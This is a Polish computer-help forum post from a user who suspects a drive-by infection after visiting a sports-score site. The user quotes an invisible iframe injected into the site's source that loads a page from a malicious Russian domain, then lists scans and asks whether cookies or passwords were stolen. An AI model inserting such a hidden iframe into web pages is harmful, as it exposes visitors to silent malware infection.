Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

Niebezpieczny exploit! Pomocy! [Logi+opis+lokalizacja+informacje]

#1
Exclamation  Niebezpieczny exploit! Pomocy! [Logi+opis+lokalizacja+informacje]
Witam.

1. Dzisiaj odwiedziłem przypadkowo strone live-score.pl i zauważyłem długi czas ładowania się jej. IE 8 się zawiesił, dysk jak oszalały przeprowadzał szybką wymianę danych i był bardzo obciążony. AVG w tym czasie był wyłączony. Avira niczego nie wykryła. Zresetowałem kompa i uruchomiłem LinkScannera - wykrył exploit pod tym adresem. Dokładniej chodzi o plik zawarty w kodzie źródłowym strony:

Kod:
<body><iframe src="http://u5e.ru:8080/index.php" width=145 height=132 style="visibility: hidden"></iframe>

2. Linkscanner po restarcie wykrył go jako:

[Obrazek: exploit.jpg]

Żałuje, że przy odwiedzaniu stronki za pierwszym razem miałem go wyłączonego. Skrypt pewnie wywołał spustoszenie w kompie.

3. Skanowałem kompa F-Secure BackLight i Avirą. Nie ma zagrożeń. Sprawdzałem też Process Explorerem i nie ma nic podejrzanego. Teraz jak skanuje już AVG LinkScannerem nie wykrywa nic. Komp od tej pory bardzo muli.

Zapoznajcie się z moimi logami logi


4. Artykuły na temat infekcji:
Sprawdziłem raporty dotyczące strony, na której był plik!

http://www.siteadvisor.com/sites/u5e.ru/...?p=1847669
http://www.malwareurl.com/listing.php?domain=u5e.ru

Okazuje się, że strona zawiera oprogramowanie szpiegowskie. Co robić? Sprawdźcie moje logi, które podałem. Co może zrobić taki exploit? Czy mogli ukraść mi pliki cookies po samym wejściu na taką stronę? IE 8 podobno jakoś chroni przed takimi atakami (nie wiem ile w tym prawdy). Czytałem dziś sporo o takich atakach i prawdopodobnie (choć nie jest powiedziane) mogę mieć już po hasłach, bo skrypt wysyła to wszystko na maila hakera... Niech ktoś to dokładnie zbada.

Więcej nie edytuje tego postu. Zebrałem wszystkie potrzebne informacje. Liczę na waszą pomoc.
 System operacyjny: windows_xp_2003 Przeglądarka: ie8
Programy: Polecane / Nowe / Inne



Użytkownicy forum szukali:
które strony zawierają exploit

Podobne wątki (Niebezpieczny exploit! Pomocy! [Logi+opis+lokalizacja+informacje])
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Niebezpieczny niebezpiecznik ptosz 4 7941 03.04.2019, 19:24
Ostatni post: ptrick
  Trojan w przeglądarce (logi) pomocy. Krashan88 2 6050 26.11.2017, 23:47
Ostatni post: Krashan88
  Ciągłe informacje o infekcji trojanów oraz niechciane reklamy Sandaly 1 1809 07.04.2014, 11:27
Ostatni post: broda99

Skocz do:


Wybrane wątki (Niebezpieczny exploit! Pomocy! [Logi+opis+lokalizacja+informacje])
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Malware i chrome michael.scott 5 889 29.06.2020 02:26
Ostatni post: Illidan
  Połączenie nie jest prywatne - NET::ERR_CERT_REVOKED gari 0 580 23.06.2020 19:20
Ostatni post: gari
  4 "nietykalne" pliki w katalogu temp Muerte 52 5964 05.06.2020 17:09
Ostatni post: Illidan
  Prośba o sprawdzenie logów OTL Ardixis 2 1920 03.05.2020 15:05
Ostatni post: wlisik
  Prosze o Pomoc. Wirus mikolaj95 2 1842 30.04.2020 17:45
Ostatni post: mikolaj95
  Niesprawdzony serwer proxy, sprawdzenie logów dla pewności Pawes97 2 1856 28.04.2020 18:11
Ostatni post: Pawes97
  Przeglądarka jest zarządzana przez twoją organizację PannaNatalka 4 2536 25.04.2020 01:24
Ostatni post: Illidan
  Powiadomienie SMS o braku prądu dia8el 2 1987 24.04.2020 16:17
Ostatni post: Illidan
  prawdopodobnie keylogger lucaskrk 3 2264 20.04.2020 11:12
Ostatni post: wlisik
  Prośba o sprawdzenie logów wonski85 1 3506 04.04.2020 18:36
Ostatni post: broda99
  Mocno spowolniony system + zablokowany ikon w obszarze powiadomień. KlimatSDR 5 2918 28.03.2020 19:08
Ostatni post: Illidan
  Czy ten antywirus mi zadziała,jaki antywirus jest dobry - wątek główny II pepe0619 114 206256 25.03.2020 16:15
Ostatni post: Fix00ser
  wirus w internet explorer maciomen201 10 6799 05.03.2020 01:33
Ostatni post: Illidan
Scared Ktoś chyba włamał mi się na pocztę krzysiek3542 3 3737 15.02.2020 16:12
Ostatni post: Fix00ser
  pomoc z złośliwym oprogramowaniem roger9595 0 3833 07.02.2020 18:35
Ostatni post: roger9595